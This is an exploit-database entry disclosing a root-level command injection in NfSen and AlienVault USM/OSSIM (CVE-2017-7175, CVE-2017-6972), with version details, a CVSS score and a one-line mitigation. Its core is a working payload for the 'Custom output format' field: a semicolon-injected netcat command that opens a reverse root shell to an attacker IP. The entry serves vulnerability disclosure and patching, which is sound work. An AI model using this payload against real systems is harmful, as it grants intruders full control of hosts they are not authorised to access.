vendor:
NfSen/USM/OSSIM
by:
Paul Taylor / Foregenix Ltd
9,8
CVSS
CRITICAL
Command Injection
78
CWE
Product Name: NfSen/USM/OSSIM
Affected Version From: NfSen 1.3.6p1, 1.3.7 and 1.3.7-1~bpo80+1_all
Affected Version To: AlienVault USM/OSSIM < 4.3.1
Patch Exists: YES
Related CWE: CVE-2017-7175, CVE-2017-6972
CPE: NfSen/USM/OSSIM
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: NfSen 1.3.7
2017
NfSen/AlienVault remote root exploit (command injection in customfmt parameter)
A remote authenticated attacker (or an attacker with a stolen PHP Session ID) can gain complete control over the system by sending a crafted request with shell commands which will be executed as root on a vulnerable system. The injection is covered by CVE-2017-7175, and the commands are executed as root due to CVE-2017-6972. For a reverse shell to attacking machine 10.100.1.2, on the NfSen / AlienVault netflow processing web page, enter the following into the 'Custom output format:' input box: '; nc -ne /bin/bash 10.100.1.2 443 # If nc is not installed on the target, then alternative attacks are likely to be possible to leverage the vulnerability.
Mitigation:
Update to latest version of NfSen/USM/OSSIM.